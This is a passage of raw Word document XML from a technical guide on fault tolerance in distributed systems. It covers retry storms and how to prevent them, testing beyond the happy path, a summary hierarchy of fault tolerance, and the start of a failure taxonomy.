        <w:t>13.3 Retry Storms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473181BD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B1231" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Service recovers from brief outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4805B62B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  All clients simultaneously retry their accumulated failed requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A7DB1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Recovered service immediately overwhelmed by retry storm → goes down again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24C29F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Clients retry again → cycle repeats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B2701" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7E2411A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C607AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Exponential backoff (spread retries over time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020D00F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Jitter (randomize retry timing so clients don't sync up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DABE58" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Retry budgets (limit retry percentage: max 10% of requests can be retries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C50937" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Client-side circuit breaker (stop retrying when obviously broken).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF5540" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Server-side retry-after header (tell clients when to retry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56766306" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13.4 Testing Only the Happy Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1B0CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA87739" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>"It works in development" ≠ "It survives in production."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF29BE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="2252B5DF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Untested failure scenarios that cause real outages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A17E927" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - "We never tested what happens when the cache is completely cold."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62585F66" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - "We never tested failover with actual production load."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350AAE9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - "We never tested what happens when the disk is 99% full."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9AB32" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - "We never tested timezone handling during DST transitions."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9956E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - "We never tested with clock skew between servers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D163E9A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C8924" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fix: Chaos engineering, game days, failure injection in staging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5F2D6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="2B6B70C1">
          <v:rect id="_x0000_i6357" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1BD87" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Summary — The Complete Fault Tolerance Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660D050" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2478F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌──────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11413E6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                    FAULT TOLERANCE HIERARCHY                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0492E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8436FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  PREVENT                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E0238" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│    Code quality, testing, capacity planning, operational rigor     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7D950" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88AA07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  DETECT                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEFB1D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│    Health checks, monitoring, alerting, anomaly detection          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5585B8FA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06163A0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  CONTAIN                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD8F11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│    Bulkheads, circuit breakers, rate limiting, load shedding      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C263534" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3BDF2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  RECOVER                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AAD47" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│    Redundancy, failover, retries, fallbacks, auto-scaling         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4657C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA17496" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  LEARN                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C026082" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│    Post-mortems, chaos engineering, game days, SLO tracking        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D0FAE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F3F62" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└──────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F5CC7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1737C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault tolerance is not about eliminating failures — failures are inevitable in any sufficiently complex system. It's about designing systems where failures are detected quickly, contained before they spread, recovered from automatically, and learned from systematically. The goal is that when (not if) a component fails, the user never notices — or at worst, experiences a brief, bounded degradation rather than a catastrophic outage. Build every system by asking: "What happens when this fails?" — and having a concrete, tested answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED2E02" w14:textId="77777777" w:rsidR="00476518" w:rsidRDefault="00476518" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="5AF7AA20" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault Tolerance — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A466F67" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="45F57160">
          <v:rect id="_x0000_i6437" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CC432" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Fault Tolerance Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F7CB7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault tolerance is not simply "making systems that don't crash." That description mistakes the symptom for the disease. Fault tolerance is the discipline of </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>engineering systems that continue providing correct, useful service in the presence of component failures — where "correct" is defined by a precise specification of what the system must guarantee, "useful" means degradation is bounded and predictable, and "presence of failures" encompasses a spectrum from hardware faults to software bugs to malicious actors, each requiring fundamentally different countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23106E6B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The engineering problem emerges from an inescapable physical and probabilistic reality: </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>at sufficient scale, failure is not an exceptional condition — it is the normal operating mode.</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve"> A system with 10,000 servers, each with 99.9% annual uptime, experiences approximately 27 server failures per day. A global storage system with 1 billion disk-hours </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>per year sees thousands of disk failures annually. A data pipeline processing 1 trillion operations per day, with software that has one bug per billion operations, encounters thousands of bugs daily. At these scales, the question is not whether failures will occur but </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how the system behaves when they do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868D51D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>This reframes the engineering problem fundamentally. Traditional software engineering asks: "How do I write code that doesn't fail?" Fault tolerance engineering asks: "Given that every component will eventually fail, how do I compose components such that the system continues to meet its specification despite any subset of components failing?" These are different problems requiring different tools, different mental models, and different metrics for success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C495FE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The three dimensions of fault tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB3706" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> — reducing the probability that faults occur. This includes hardware redundancy, formal verification, rigorous testing, code review, and design patterns that eliminate entire classes of faults. Prevention is economically bounded — zero probability of failure is physically impossible and financially ruinous to approach asymptotically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A9D80" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> — discovering that a fault has occurred. A fault that is undetected is worse than no fault detection at all — it produces incorrect results that may be acted upon. Detection mechanisms include checksums, heartbeats, assertions, formal invariant checking, and comparison of redundant computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B8F372" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> — restoring correct operation after a fault has been detected. Recovery ranges from immediate (a redundant hardware component takes over in microseconds) to eventual (a background process repairs corrupted data over hours) to manual (a human operator intervenes based on monitoring alerts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42601BE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The art of fault tolerance is choosing the right combination of prevention, detection, and recovery for each failure mode, at each layer of the system, within the constraints of latency, cost, and operational complexity — and formally reasoning about what the composition guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A5ACE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="740B4FEE">
          <v:rect id="_x0000_i6438" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A8966" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Fault Model — What Can Go Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715CB93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure Taxonomy — Precise Classification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F7EBF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault tolerance engineering requires precise vocabulary because different failure modes require different responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E5601" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D63E6E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Failure mode hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5725C22C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5E97055F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fail-Stop (most benign):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B60339" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Component stops operating completely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA68941" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  No incorrect output produced (stops rather than lies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC83DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Detectable: absence of output indicates failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B9BDD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E73A51" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4DE6A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Process crashes (SIGSEGV, OOM kill, kernel panic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C549B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Network interface physically disconnected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A90C8D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Power loss to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015363BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77259CA0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Handling: simple — detect absence, failover to replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F69FF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Detection: timeout + health check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28636CB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EAC48" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fail-Slow (often worse than fail-stop):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A340D0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Component continues operating but extremely slowly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E50C08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Correct output eventually produced — but after unacceptable delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B48C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2D047" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Insidious because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D2E86" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Timeout too short: treat as fail-stop → unnecessary failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285EB8E7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Timeout too long: system appears degraded → cascading backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E830D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA56C8F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67429159" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Disk with growing bad sectors (reads taking 30s instead of 1ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCEF6A5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
